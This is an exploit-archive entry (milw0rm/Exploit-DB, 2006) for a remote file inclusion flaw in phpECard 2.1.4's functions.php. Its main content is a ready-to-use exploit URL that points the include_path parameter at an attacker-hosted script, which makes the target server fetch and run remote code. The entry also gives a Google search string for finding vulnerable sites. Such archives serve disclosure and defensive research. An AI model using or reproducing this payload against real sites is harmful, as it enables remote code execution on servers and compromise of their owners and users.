PHPECard 2.1.4 - 'functions.php' Remote File Inclusion

EDB-ID:

2275

Author:

LeAk

Type:

webapps

Platform:

PHP

Published:

2006-08-29

#==============================================================================================
# phpECard (functions.php) Remote File Inclusion Exploit
#===============================================================================================
#                                                                          
#Critical Level : Dangerous                                                
#                                                                          
#Venedor site : http://www.quick-xs.net/phpecard/
#          
#Google Search: powered by: phpecard                                                                                                                          
#                                                             
#================================================================================================
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/functions.php?include_path=http://evil_script?
#
#
#================================================================================================
#Discoverd By : LeAk
#
#Conatact : Escape_LeAk[at]yahoo.com
#
# Turkis Hackers
==================================================================================================

# milw0rm.com [2006-08-29]